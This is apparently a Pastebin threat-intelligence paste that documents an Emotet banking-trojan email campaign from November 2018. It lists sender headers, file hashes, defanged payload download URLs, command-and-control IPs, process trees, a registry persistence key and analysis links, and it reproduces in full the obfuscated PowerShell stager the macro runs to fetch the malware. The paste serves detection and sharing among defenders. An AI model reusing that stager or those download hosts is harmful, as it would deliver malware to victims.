Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Emotet #Banker #Feodo #W97M #Poweshell
- https://pastebin.com/THHMs2wg
- other_Emotet_IOCs:
- https://pastebin.com/KVNyw9Uq
- https://pastebin.com/L2nSzNU4
- previous contact:
- https://pastebin.com/Y6DnbpHv
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
- https://kc.mcafee.com/corporate/index?page=content&id=KB90108
- attack_vector
- --------------
- email attach .doc > macro > powershell > GET > %temp%\*.exe
- email_headers
- --------------
- Received: from public-swhrmf-2c.serverdata.net (public-swhrmf-2c.serverdata.net [64.78.61.27])
- Received: from public-swhrmf-2c.serverdata.net ([64.78.61.27])
- Received: from mail12.intermedia.net (unknown [64.78.61.134])
- Date: Fri, 09 Nov 2018 03:44:58 -0300
- From: Интернет-магазин С торгом <info@storgom.ua> <auxiliaradmon1@ravisa.com>
- To: user0@hq.88.victim.com
- Subject: Интернет-магазин С торгом: Order receipt #4553
- files
- --------------
- SHA-256 af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8
- File name FILE-901171445210110.doc
- File size 71.13 KB
- SHA-256 9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d
- File name extr
- File size 132 KB
- SHA-256 db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050
- File name WCPDll
- File size 357.5 KB
- activity
- **************
- payload_src
- --------------
- h11p\мягкое-стекло{.} рф/OYRECjhJU 404
- h11p\sastudio{.} co/GgGV3mOVlN 200
- h11p\priscawrites{.} com/tS6M2ffhC 200
- h11p\gbsbrows{.} com/JZLqJd4 200
- h11p\evelin{.} ru/fgARtN6g 404
- netwrk
- --------------
- 132.148.254.223 gbsbrows{.} com GET /JZLqJd4 HTTP/1.1 no User Agent
- 187.163.174.149 187.163.174.149:8080 GET / HTTP/1.1 Mozilla/4.0
- comp
- --------------
- powershell.exe 2604 132.148.254.223 80 ESTABLISHED
- colorerkey.exe 2656 187.163.174.149 8080 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\CMD.exe CMD c:\wiNdoWS\SySTem32\CMd /c"SEt vmN=.( $sHELLId[1]+$sHeLlid[13]+'x') ...
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') ( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ...
- "C:\tmp\862.exe"
- "C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe"
- *obfuscated download command:
- --------------
- /c"SEt vmN=.( $sHELLId[1]+$sHeLlid[13]+'x')( New-oBJEct io.coMpREsSioN.dEFLatEstREAM([iO.MEmorysTREAm] [COnVERt]::FrOMbaSe64sTrINg( 'NZDdasJAEIVfJRcLq1g3VEsoLgGLVlFaBaX2h95kk0l2NdlNk4lrG3z3JrbO5fnOHOYMqaLC12D7RuwhRGcFyF5BTFIFGjmZTn98KhHzkesmohSFsSULTeYuP56+ltHd+J9Za1kZlFhFyjTcnSfz3TBb79LV1XHS/WYARSJsJEUVD4PM06yV89tAuev3zeNkL5cv1wU4Qqo0Kyo3Th42uPKSK8kLVYaBLRTC3zG49Z4HcSwnlG3zVGGHjmmXk7do5vgOvfcGlJNoM/MJ6OMIIct79JP2Wt6jDE5AeWwKCELZIVhKR2mnLd6tsfiuSfMgNjVWpyaIZiqFi+fGaQO7fKGP5gD9RRN6Ubhocg78HAYYyvp8/gU=' ) , [sYstem.io.COMPressIoN.ComPrESSIonMOdE]::DeCOMPress ) ^| % {New-oBJEct syStem.io.STreAmrEadEr( $_, [SYsTEM.tExT.EnCOdiNg]::aScII)}^| %{ $_.reAdTOeND()}) && pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') ( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ) ( [tYPE]( \"{0}{1}{2}\"-f 'E','N','VirOnment' ) ) ; ( ^& (\"{1}{0}{2}\" -f'ARIA','V','blE' ) ( \"{1}{0}\" -f 'X*xT','E')).\"Val`UE\".\"INvo`kECOmM`AND\".(\"{1}{2}{3}{0}\" -f'PT','in','Vok','ESCri' ).Invoke( ( ( .('Gi' ) ( \"{0}{1}{2}\" -f 'VArIA','bLE:0S','kx')).\"Val`Ue\"::( \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM').Invoke( 'VmN',(\"{1}{0}{2}\" -f 'RoCE','P','ss' ) ) ) )"
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 09.11.2018 14:52
- colorerkey Windows Componentization Platform Servicing API Microsoft Corporation
- c:\users\operator\appdata\local\microsoft\windows\colorerkey.exe 09.11.2018 14:45
- drop
- --------------
- C:\tmp\862.exe
- C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe
- # # #
- doc - https://www.virustotal.com/#/file/af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8/details
- exe - https://www.virustotal.com/#/file/9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d/details
- https://analyze.intezer.com/#/analyses/c028884b-15ca-4bda-abd0-a22d511fe240
- exe#2 - https://www.virustotal.com/#/file/db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050/details
- https://analyze.intezer.com/#/analyses/01b66204-33f5-4128-8f0f-11db305a3101
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement